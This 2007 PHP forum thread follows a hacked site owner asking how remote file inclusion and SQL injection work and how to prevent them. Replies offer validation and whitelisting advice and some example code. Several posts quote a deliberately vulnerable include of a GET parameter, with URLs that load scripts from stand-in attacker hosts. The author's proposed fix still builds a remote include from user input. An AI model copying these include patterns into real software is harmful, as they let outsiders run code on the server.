crawlerbasher Posted May 3, 2007

Recently my site got hacked into and was used as a platform for hosting a fake eBay site to steal passwords. After talking to my host provider, it has been made clear that one of the PHP scripts could have data injected into it to upload files to my site. Now does anyone have any more information on how this can be done, and how to prevent this from happening again?

ToonMariner Posted May 3, 2007

Yes, check data before you use it. This is common with include files, MySQL queries or where you use exec(); make sure that you verify data that is going to be used in such cases.

crawlerbasher (Author) Posted May 3, 2007

So an include("main.php") could be susceptible to code injection? Would, say, using include("http://www.test.com/main.php") help prevent this? And how can I verify data that would pass through? These are my own scripts, so it's not as if I'm intending to grant ppl access to my site.

techtheatre Posted May 3, 2007

include("main.php") is safe... (assuming no problems in main.php)

If instead you were to have http://www.test.com/lookup.php?page=main.php where lookup.php had the following

include("$page");

this would NOT be safe (anything could be passed as a value for the variable "$page", so you are potentially including anything)...

Same idea for inserting data into SQL... if you are inserting variables that were passed by a site user you will want to check them first. Encode the characters that could cause problems, and validate that number fields only contain numbers, email address fields contain valid email addresses, strip out things that are not allowed... etc. There is LOTS of info about this online, so just Google for "SQL Injection" and find a PHP function that will clean up your data.

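Added example (not part of any post in this thread): the checks techtheatre describes for number and email fields, followed by an insert that uses PDO bound parameters rather than an escaping function. The users table, the add_user() helper and the sample inputs are constructed for illustration, and the pdo_sqlite extension is assumed to be available.

```php
<?php
// Added example: table, helper name and sample values are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, age INTEGER)');

// Validate the fields, then insert them with bound parameters.
// Returns a list of error strings; an empty list means the row was stored.
function add_user(PDO $db, array $input)
{
    $errors = array();
    // Number field: must be a whole number in a sane range.
    $age = filter_var(isset($input['age']) ? $input['age'] : null,
        FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 0, 'max_range' => 150)));
    if ($age === false) {
        $errors[] = 'age must be a whole number between 0 and 150';
    }
    // Email field: must parse as an address.
    $email = filter_var(isset($input['email']) ? $input['email'] : null,
        FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $errors[] = 'email is not a valid address';
    }
    if ($errors) {
        return $errors;
    }
    // Placeholders keep the values out of the SQL text, so a quote inside
    // a value is stored as data instead of changing the statement.
    $stmt = $db->prepare('INSERT INTO users (email, age) VALUES (:email, :age)');
    $stmt->bindValue(':email', $email, PDO::PARAM_STR);
    $stmt->bindValue(':age', $age, PDO::PARAM_INT);
    $stmt->execute();
    return array();
}

// Constructed inputs standing in for $_POST: one well-formed, one malformed.
var_dump(add_user($db, array('email' => 'alice@example.com', 'age' => '34')));
var_dump(add_user($db, array('email' => "bob'@", 'age' => '12abc')));
var_dump((int) $db->query('SELECT COUNT(*) FROM users')->fetchColumn());
```
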
Nameless12 Posted May 3, 2007

I just had to share some code that cracks me up

<?php
// the request url = http://localhost/index.php?id=http://www.attackersWebpage.com/VeryNastyScript.php
include ($_GET['id']);
?>

Oh, and don't forget there are many other types of injection. Even someone just putting bold tags in their name so that they appear to be special wherever their name is used can be a nuisance, so validate everything. (And the above attack can be protected against by modifying your php.ini.)

crawlerbasher (Author) Posted May 4, 2007

I've been doing some reading on this, and my head hurts. So much to think about. What was once a basic script is now my downfall. (Caught with pants down.) I've been thinking of possible ways around this and one of them (off the top of my head) is something like this:

<?php
$id = $_GET['id'];
if ($id) {
    include("http://www.test.com/$id");
}
?>

Now then, if someone tried to put in http://www.test.com?id=http://www.attacker.com/attacker.php then this code would try to include http://www.test.com/http://www.attacker.com/attacker.php

Now could something that simple work? What kind of problem could this cause? I'll keep researching this, and thanks for the help.

jscix Posted May 4, 2007

You can make sure the file ext. trying to be included is .php, and you can make sure the file trying to be included is within a specific folder. This should make it a bit more secure also.

jscix Posted May 4, 2007

Also, I recommend adding a logging feature for failed includes. Normally people try multiple things before succeeding... so you will at least have a log of your attacker.

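Added example (not code from any poster here): one way to combine jscix's suggestions, that is a fixed .php extension, a single allowed folder and a log of rejected requests. PAGE_DIR, INCLUDE_LOG, resolve_page() and log_failed_include() are hypothetical names; a pages/ folder containing home.php and missing.php and a writable logs/ folder are assumed to exist.

```php
<?php
// Added example: PAGE_DIR, INCLUDE_LOG and both functions are hypothetical names.
define('PAGE_DIR', __DIR__ . '/pages');   // only files in here may be included
define('INCLUDE_LOG', __DIR__ . '/logs/failed_includes.log'); // should not be web-readable

// Map a user-supplied page name to a file in PAGE_DIR.
// Returns the absolute path to include, or null when the request is refused.
function resolve_page($name)
{
    $base = realpath(PAGE_DIR);
    // Letters, digits, '_' and '-' only: no slashes, dots, "://" or NUL bytes.
    if ($base !== false && is_string($name)
        && preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        // The script supplies the extension; the request never does.
        $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
        // realpath() follows symlinks, so re-check the resolved folder.
        if ($path !== false && dirname($path) === $base && is_file($path)) {
            return $path;
        }
    }
    log_failed_include($name);
    return null;
}

function log_failed_include($name)
{
    // JSON-encode the raw value so it cannot add forged lines to the log.
    $value = json_encode($name, JSON_INVALID_UTF8_SUBSTITUTE);
    $ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '-';
    error_log(gmdate('c') . " ip=$ip value=$value\n", 3, INCLUDE_LOG);
}

$show = isset($_GET['show']) ? $_GET['show'] : 'home';
$page = resolve_page($show);
if ($page === null) {
    http_response_code(404);
    $page = PAGE_DIR . '/missing.php';
}
require $page;
```

Because the name pattern excludes ":" and "/", a URL passed as the parameter is refused and logged before any file function sees it.
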
crawlerbasher (Author) Posted May 4, 2007

While trying to get my head around this, I would like other ppl that are not aware of this to keep this in mind. And I've found a good site that gives some simple examples of how to help with injections.

http://www.acunetix.com/websitesecurity/php-security-1.htm

I don't want ppl making the same mistakes I made.

clown[NOR] Posted May 4, 2007

What I do with the include part of my index.php is that I always check for slashes, and also I always use if (!file_exists()) { $include = "missing.php"; }

So... this is how my homepage part looks:

<?php
$include = "home.php";
// Read each parameter only if it was sent, to avoid undefined-index notices
$show    = isset($_GET['show'])    ? $_GET['show']    : null;
$archive = isset($_GET['archive']) ? $_GET['archive'] : null;
$aID     = isset($_GET['aID'])     ? $_GET['aID']     : null;

if (isset($show)) {
    if (!isset($archive)) {
        // A slash in the value means a path was passed in: refuse it
        if (!is_string($show) || strpos($show, "/") !== false) {
            $include = "missing.php";
        } else {
            $include = "$show.php";
        }
    } else {
        // explode() cannot split an array, so test each value on its own
        $ok = true;
        foreach (array($show, $archive, $aID) as $value) {
            if (!is_string($value) || strpos($value, "/") !== false) {
                $ok = false;
            }
        }
        $include = $ok ? "archive/$archive/$aID/$aID.php" : "missing.php";
    }
}

if (!file_exists($include)) {
    $include = "missing.php";
}
require_once($include);
?>

I feel pretty safe when it comes to trying to mess with my URL... and I try to secure all my MySQL code the best way I know how... like you guys said... strip_tags(), stripslashes(), trim(), mysql_real_escape_string() etc... Wish people had more to do than hacking other people's sites... would save us a lot of work...